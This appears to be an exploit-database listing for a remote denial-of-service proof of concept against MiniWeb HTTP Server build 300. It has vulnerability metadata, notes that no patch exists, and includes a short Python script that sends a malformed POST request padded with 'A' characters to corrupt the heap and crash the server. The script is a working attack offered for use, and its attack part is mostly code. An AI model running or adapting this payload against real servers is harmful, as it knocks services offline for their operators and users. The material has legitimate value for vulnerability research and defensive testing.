Mini Web HTTP Server remote DoS exploit

vendor:

MiniWeb HTTP Server

by:

dmnt

7,5

CVSS

HIGH

Heap corruption

119

CWE

Product Name: MiniWeb HTTP Server

Affected Version From: Build 300

Affected Version To: Build 300

Patch Exists: NO

Related CWE: N/A

CPE: miniweb

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 SP1 RUS

2013

Mini Web HTTP Server remote DoS exploit

This exploit is a proof-of-concept (PoC) for a remote denial-of-service (DoS) vulnerability in MiniWeb HTTP server (build 300, built on Feb 28 2013) by Stanley Huang. The vulnerability is caused by a heap corruption when sending a specially crafted POST request with a large number of 'A' characters. This can cause the server to crash.

Mitigation:

No known mitigation or remediation is available for this vulnerability.

Source

Exploit-DB raw data:

# MiniWeb HTTP server (build 300, built on Feb 28 2013) by Stanley Huang
# http://sourceforge.net/projects/miniweb/files/miniweb/0.8/miniweb-win32-20130309.zip/download
# Heap corruption PoC - remote DoS
# Tested on Win7 SP1 RUS
# (x) dmnt 2013

import socket

print 'Mini Web HTTP Server remote DoS exploit by dmnt\n'
host = "127.0.0.1"
port = 8000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print 'Connect to host and send payload\n'
stuff = 'POST /'+'"' +' HTTP/1.\r\n'
stuff+= 'Content-Type: application/x-www-form-urlencoded\r\n'
stuff+= 'Content-Length: 0\r\n\r\n'
stuff+= 'A'*15
s.send(stuff)
print 'Server crashed\n'

# Exploit-DB note:
# Tinker with the amount of As to get this to work